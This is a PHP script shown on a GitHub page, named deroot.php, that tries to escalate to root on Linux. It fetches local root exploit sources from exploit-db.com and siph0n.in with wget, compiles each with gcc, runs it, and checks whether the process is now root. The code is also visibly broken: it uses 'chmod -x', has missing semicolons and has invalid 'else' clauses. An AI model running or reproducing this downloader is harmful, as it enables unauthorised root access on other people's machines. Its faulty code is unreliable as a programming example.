-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathderoot.php
163 lines (157 loc) · 4.15 KB
/
deroot.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
<?php
# local root exploits from 2002-2015
print "___ __
__| _/___________ ____ _____/ |_
/ __ |/ __ \_ __ \/ _ \ / _ \ __\
/ /_/ \ ___/| | \( <_> | <_> ) |
\____ |\___ >__| \____/ \____/|__|
\/ \/";
print "Usage: php deroot.php\n";
$kernel = system("uname -a");
print "kernel info: $kernel\n";
sleep(5);
print "Ubuntu 12.04, 14.04, 14.10, 15.04 - overlayfs Local Root (Shell)\n";
system("wget https://www.exploit-db.com/download/37292\n");
system("mv 37292 37292.c\n");
system("gcc 37292.c -o ofs\n");
system("chmod -x ofs\n");
system("./ofs\n");
sleep(2);
print "Apport/Abrt - Local Root Exploit\n";
sleep(2);
system("wget https://www.exploit-db.com/download/36746\n");
system("mv 36746 36746.c\n");
system("gcc 36746.c -o apport\n");
system("chmod -x apport\n");
system("./apport");
system("id");
if (posix_getuid() == 0){
print "you are root";
}
else {
print "Fail";
}
sleep(2);
print "2001 local exploit\n";
system("wget http://siph0n.in/dumps/local_exploits/2001/hudo.c\n");
system("gcc hudo.c -o hudo\n");
system("chmod -x hudo");
system("./hudo");
if (posix_getuid() == 0) {
print "you are root\n";
}
else (posix_getuid() !== 0) {
print "you are not root\n";
}
print "------------------\n";
sleep(2);
print "2002 DHCP-exploit\n";
system("wget http://siph0n.in/dumps/local_exploits/2002/dhcp-expl.c\n");
system("gcc dhcp-expl.c -o dhcp\n")
system("chmod -x dhcp\n");
system("./dhcp");
if (posix_getuid() == 0) {
print "you are root\n";
}
else (posix_getuid() !== 0) {
print "you are not root\n";
}
print "---------------------\n";
print "2003 hatorihanzo.c";
system("wget http://siph0n.in/dumps/local_exploits/2003/hatorihanzo.c\n");
system("gcc hatorihanzo.c -o hatori\n");
system("chmod -x hatori\n");
system("./hatori");
if (posix_getuid() == 0) {
print "you are root\n";
}
else (posix_getuid() !== 0) {
print "you are not root\n";
}
print "-------------------\n";
sleep(2);
print "2003 ptrace-kmod.c";
system("wget http://siph0n.in/dumps/local_exploits/2003/ptrace-kmod.c\n");
system("gcc ptrace-kmod.c -o ptrace\n")
system("chmod -x ptrace\n");
system("./ptrace\n");
if (posix_getuid() == 0) {
print "you are root\n";
}
else (posix_getuid() !== 0) {
print "you are not root\n";
}
print "--------------\n";
print "2004 hping.c\n";
system("wget http://siph0n.in/dumps/local_exploits/2004/hping.c\n");
system("gcc hping.c -o hping\n");
system("chmod -x hping\n");
system("./hping\n");
if (posix_getuid() == 0) {
print "you are root\n";
}
else (posix_getuid() !== 0) {
print "you are not root\n";
}
print "---------------\n";
print "2004 kernel.c\n";
system("wget http://siph0n.in/dumps/local_exploits/2004/kernel.c\n");
system("gcc kernel.c -o kernel\n");
system("chmod -x kernel\n");
system("./kernel\n");
if (posix_getuid() == 0) {
print "you are root\n";
}
else (posix_getuid() !== 0) {
print "you are not root\n";
}
print "------------\n";
print "2004 mremap.c\n";
system("wget http://siph0n.in/dumps/local_exploits/2004/mremap_pte.c\n");
system("gcc mremap_pte.c -o mremap");
system("chmod -x mremap");
system("./mremap");
if (posix_getuid() == 0) {
print "you are root\n";
}
else (posix_getuid() !== 0) {
print "you are not root\n";
}
print "----------------\n";
print "2005 expand_stack SMP race local root exploit\n";
system("wget http://siph0n.in/dumps/local_exploits/2005/1.c\n");
system("gcc 1.c -o a\n");
system("chmod -x a\n");
system("./a\n");
if (posix_getuid() == 0) {
print "you are root\n";
}
else (posix_getuid() !== 0) {
print "you are not root\n";
}
print "-----------\n";
print "ecl-nf-snmpwn.c\n";
system("wget http://siph0n.in/dumps/local_exploits/2006/2.c\n");
system("gcc 2.c -o b\n");
system("chmod -x b\n");
system("./b\n");
if (posix_getuid() == 0) {
print "you are root\n";
}
else (posix_getuid() !== 0) {
print "you are not root\n";
}
print "--------------\n";
print "2006 prct2.c";
system("wget http://siph0n.in/dumps/local_exploits/2006/prct2.c\n");
system("gcc prct2.c -o prct\n");
system("chmod -x prct\n");
system("./prct\n");
if (posix_getuid() == 0) {
print "you are root\n";
}
else (posix_getuid() !== 0) {
print "you are not root\n";
}
print "----------------\n";
?>